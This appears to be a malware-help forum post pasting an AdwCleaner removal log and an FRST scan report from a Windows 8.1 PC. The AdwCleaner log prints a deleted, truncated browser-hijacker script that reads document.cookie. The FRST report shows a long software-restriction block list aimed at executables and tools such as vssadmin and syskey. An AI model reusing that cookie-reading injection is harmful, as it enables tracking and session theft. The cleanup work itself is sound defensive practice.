Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
Key Deleted : HKCU\Software\Optimizer Pro
Key Deleted : HKCU\Software\DriverSupport
Key Deleted : HKCU\Software\Easy Speed Check
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : HKLM\SOFTWARE\SearchProtect
Key Deleted : HKLM\SOFTWARE\TermTutor
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{597FB4A5-DD86-4316-A410-7E8074CC2CCE}
Data Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC32Loader.dll
Data Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mystart.com
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\trovi.com
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www-search.net
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.mystart.com
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.trovi.com

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17344

Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]

-\\ Mozilla Firefox v32.0.3 (x86 en-US)

[1hcaal8x.default\prefs.js] - Line Deleted : user_pref("browser.newtab.url", "hxxp://www.trovi.com/?gd=&ctid=CT3330389&octid=EB_ORIGINAL_CTID&ISID=M7BB70274-6B99-4688-B46C-0E1CA51F6087&SearchSource=69&CUI=&SSPV=&Lay=1&UM=6&UP=SPC0F8B4F2-3D31-425[...]
[1hcaal8x.default\prefs.js] - Line Deleted : user_pref("browser.search.defaultenginename", "Trovi search");
[1hcaal8x.default\prefs.js] - Line Deleted : user_pref("browser.search.selectedEngine", "Trovi search");
[1hcaal8x.default\prefs.js] - Line Deleted : user_pref("browser.startup.homepage", "hxxp://www.trovi.com/?gd=&ctid=CT3330389&octid=EB_ORIGINAL_CTID&ISID=M7BB70274-6B99-4688-B46C-0E1CA51F6087&SearchSource=55&CUI=&UM=6&UP=SPC0F8B4F2-3D31-425F-BF6E[...]
[1hcaal8x.default\prefs.js] - Line Deleted : user_pref("extensions.PV4j0xpiJzSJwJq8.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.indexOf(\[...]

-\\ Google Chrome v38.0.2125.111

[C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3330389&octid=EB_ORIGINAL_CTID&ISID=M7BB70274-6B99-4688-B46C-0E1CA51F6087&SearchSource=58&CUI=&UM=6&UP=SPC0F8B4F2-3D31-425F-BF6E-6B56E5390FD1&q={searchTerms}&SSPV=
[C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3330389&octid=EB_ORIGINAL_CTID&ISID=M7BB70274-6B99-4688-B46C-0E1CA51F6087&SearchSource=58&CUI=&UM=6&UP=SPC0F8B4F2-3D31-425F-BF6E-6B56E5390FD1&q={searchTerms}&SSPV=
[C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\preferences] - Deleted [Startup_URLs] : hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3330389&octid=EB_ORIGINAL_CTID&ISID=M7BB70274-6B99-4688-B46C-0E1CA51F6087&SearchSource=58&CUI=&UM=6&UP=SPC0F8B4F2-3D31-425F-BF6E-6B56E5390FD1&q={searchTerms}&SSPV=
[C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\preferences] - Deleted [Startup_URLs] : hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3330389&octid=EB_ORIGINAL_CTID&ISID=M7BB70274-6B99-4688-B46C-0E1CA51F6087&SearchSource=58&CUI=&UM=6&UP=SPC0F8B4F2-3D31-425F-BF6E-6B56E5390FD1&q={searchTerms}&SSPV=

-\\ Comodo Dragon v

[C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3330389&octid=EB_ORIGINAL_CTID&ISID=M7BB70274-6B99-4688-B46C-0E1CA51F6087&SearchSource=58&CUI=&UM=6&UP=SPC0F8B4F2-3D31-425F-BF6E-6B56E5390FD1&q={searchTerms}&SSPV=
[C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3330389&octid=EB_ORIGINAL_CTID&ISID=M7BB70274-6B99-4688-B46C-0E1CA51F6087&SearchSource=58&CUI=&UM=6&UP=SPC0F8B4F2-3D31-425F-BF6E-6B56E5390FD1&q={searchTerms}&SSPV=

*************************

AdwCleaner[R0].txt - [21601 octets] - [28/09/2014 11:24:47]
AdwCleaner[R1].txt - [16052 octets] - [28/09/2014 11:42:51]
AdwCleaner[R2].txt - [7679 octets] - [12/11/2014 13:54:10]
AdwCleaner[R3].txt - [7756 octets] - [12/11/2014 14:09:59]
AdwCleaner[S0].txt - [15720 octets] - [28/09/2014 11:48:41]
AdwCleaner[S1].txt - [7860 octets] - [12/11/2014 14:11:41]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [7920 octets] ##########

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014
Ran by Nick (administrator) on NICKS-PC on 12-11-2014 14:19:27
Running from C:\Users\Nick\Desktop
Loaded Profile: Nick (Available profiles: Nick)
Platform: Windows 8.1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Coupons.com Inc.) C:\Program Files (x86)\Coupons\CouponPrinterService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
() C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(TomTom) C:\Program Files (x86)\TomTom HOME 2\TomTomHOMEService.exe
(Atheros) C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe
(McAfee, Inc.) C:\Program Files\mcafee\msc\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\livecomm.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe
() C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\ActivateDesktop.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Spotify Ltd) C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\platform\McUICnt.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7191768 2013-06-27] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321176 2013-06-28] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_PushButton] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321176 2013-06-28] (Realtek Semiconductor)
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [5762408 2013-03-05] (Dell Inc.)
HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtPreLoad.exe [64640 2012-12-28] ()
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3010952 2012-12-21] (Synaptics Incorporated)
HKLM\...\Run: [SpywareClearShield] => C:\Program Files (x86)\Spyware Clear\SpywareClearShield.exe
HKLM\...\Run: [SpywareClearUpdater] => C:\Program Files (x86)\Spyware Clear\SpywareClearUpdate.exe
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [285240 2012-11-19] (Intel Corporation)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [102928 2012-10-23] (CyberLink Corp.)
HKLM-x32\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [537992 2014-01-28] (McAfee, Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)
HKLM Group Policy restriction on software: *.xlsx*.scr <====== ATTENTION
HKLM Group Policy restriction on software: lsassvrtdbks.exe <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\LocalLow\*.pif <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\LocalLow\*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.png*.com <====== ATTENTION
HKLM Group Policy restriction on software: %appdata%\*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.doc*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.divx*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.txt*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.bmp*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.zip*.pif <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Local\*.scr <====== ATTENTION
HKLM Group Policy restriction on software: %appdata%\*\*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.bmp*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.rar*.com <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\LocalLow\*\*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.gif*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.wav*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.pptx*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.rtf*.com <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Local\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.mp4*.scr <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.wav*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.png*.pif <====== ATTENTION
HKLM Group Policy restriction on software: %appdata%\*\*.com <====== ATTENTION
HKLM Group Policy restriction on software: %appdata%\*\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.wmv*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.jpg*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.wmv*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.xlsx*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.pub*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.zip*.com <====== ATTENTION
HKLM Group Policy restriction on software: %allusersprofile%\*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.pdf*.scr <====== ATTENTION
HKLM Group Policy restriction on software: %programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.mp3*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.docx*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.divx*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.ppt*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.pdf*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.jpeg*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.pub*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.pdf*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.jpg*.pif <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\LocalLow\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.bmp*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.pptx*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *:\$Recycle.Bin <====== ATTENTION
HKLM Group Policy restriction on software: %appdata%\*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.avi*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.rar*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *‮* <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Roaming\*\*.com <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Roaming\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.gif*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.docx*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.doc*.com <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.scr <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.doc*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\*.pif <====== ATTENTION
HKLM Group Policy restriction on software: syskey.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.jpg*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.pptx*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.rtf*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.wav*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.xlsx*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.gif*.exe <====== ATTENTION
HKLM Group Policy restriction on software: C:\Users\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: cipher.exe <====== ATTENTION
HKLM Group Policy restriction on software: scsvserv.exe <====== ATTENTION
HKLM Group Policy restriction on software: %programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.pdf*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.pub*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.bmp*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.avi*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.wav*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.xlsx*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.avi*.com <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.wmv*.scr <====== ATTENTION
HKLM Group Policy restriction on software: %programdata%\*\svchost.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.ppt*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.zip*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.divx*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Local\*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.zip*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.7z*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.xls*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.xls*.pif <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Local\*.pif <====== ATTENTION
HKLM Group Policy restriction on software: %programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*.pif <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\LocalLow\*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.doc*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.xls*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.gif*.com <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Roaming\*.com <====== ATTENTION
HKLM Group Policy restriction on software: %appdata%\*\*.scr <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.jpeg*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.pub*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\Appdata\Roaming\Microsoft\Windows\IEUpdate\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.rtf*.scr <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\LocalLow\*\*.pif <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.ppt*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.docx*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.ppt*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.7z*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.jpeg*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.jpeg*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.mp4*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.7z*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.txt*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.docx*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.wma*.com <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\*.com <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\LocalLow\*\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.jpg*.scr <====== ATTENTION
HKLM Group Policy restriction on software: vssadmin.exe <====== ATTENTION
HKLM Group Policy restriction on software: lsassw86s.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.divx*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.mp3*.com <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Roaming\*\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.wma*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %programfiles(x86)%\*\svchost.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.pptx*.pif <====== ATTENTION
HKLM Group Policy restriction on software: %programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.rar*.pif <====== ATTENTION
HKLM Group Policy restriction on software: %systemdrive%\*\svchost.exe <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Roaming\*.scr <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Roaming\*.pif <====== ATTENTION
HKLM Group Policy restriction on software: C:\Users\*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.txt*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.mp4*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Roaming\*\*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.mp3*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Roaming\*\*.pif <====== ATTENTION
HKLM Group Policy restriction on software: C:\Users\*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.7z*.com <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\LocalLow\*\*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.avi*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.wma*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.mp4*.pif <====== ATTENTION
HKLM Group Policy restriction on software: %programfiles%\*\svchost.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.png*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.mp3*.pif <====== ATTENTION
HKLM Group Policy restriction on software: %userprofile%\AppData\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %allusersprofile%\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.wma*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.wmv*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.txt*.com <====== ATTENTION
HKLM Group Policy restriction on software: *.xls*.com <====== ATTENTION
HKLM Group Policy restriction on software: %allusersprofile%\*.pif <====== ATTENTION
HKLM Group Policy restriction on software: *.png*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %allusersprofile%\*.scr <====== ATTENTION
HKLM Group Policy restriction on software: *.rtf*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %appdata%\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: *.rar*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %appdata%\*.com <====== ATTENTION
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe [129664 2012-12-28] ( (Qualcomm Atheros Commnucations))
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-638231278-2563524819-3576094203-1001\...\Run: [TomTomHOME.exe] => C:\Program Files (x86)\TomTom HOME 2\TomTomHOMERunner.exe [248208 2013-08-27] (TomTom)
HKU\S-1-5-21-638231278-2563524819-3576094203-1001\...\Run: [Facebook Update] => C:\Users\Nick\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2014-06-26] (Facebook Inc.)
HKU\S-1-5-21-638231278-2563524819-3576094203-1001\...\Run: [Driver Support] => C:\Program Files (x86)\Driver Support\Driver Support\DriverSupport.exe /applicationMode:systemTray /showWelcome:false
HKU\S-1-5-21-638231278-2563524819-3576094203-1001\...\Run: [Spotify] => C:\Users\Nick\AppData\Roaming\Spotify\Spotify.exe [6553144 2014-10-22] (Spotify Ltd)
HKU\S-1-5-21-638231278-2563524819-3576094203-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [22065760 2014-10-01] (Skype Technologies S.A.)
HKU\S-1-5-21-638231278-2563524819-3576094203-1001\...\Run: [Spotify Web Helper] => C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1514040 2014-10-22] (Spotify Ltd)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)
ShellIconOverlayIdentifiers: [DBARFileBackuped] -> {831cebdd-6baf-4432-be76-9e0989c14aef} => C:\WINDOWS\system32\mscoree.dll (Microsoft Corporation)
ShellIconOverlayIdentifiers: [DBARFileNotBackuped] -> {275e4fd7-21ef-45cf-a836-832e5d2cc1b3} => C:\WINDOWS\system32\mscoree.dll (Microsoft Corporation)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
SearchScopes: HKLM - {D4081D33-6F22-48A3-8C77-50B7381FA1AE} URL = http://www.bing.com/...=IE10TR&pc=DCJB
SearchScopes: HKLM-x32 - {D4081D33-6F22-48A3-8C77-50B7381FA1AE} URL = http://www.bing.com/...=IE10TR&pc=DCJB
SearchScopes: HKCU - DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKCU - {D4081D33-6F22-48A3-8C77-50B7381FA1AE} URL =
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Qualcomm Atheros Commnucations)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
BHO: savernet -> {f1bf4d17-a17e-4311-ba3a-ec4384e7ee35} -> C:\ProgramData\savernet\sDW70t8VQ2RNoZ.x64.dll No File
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
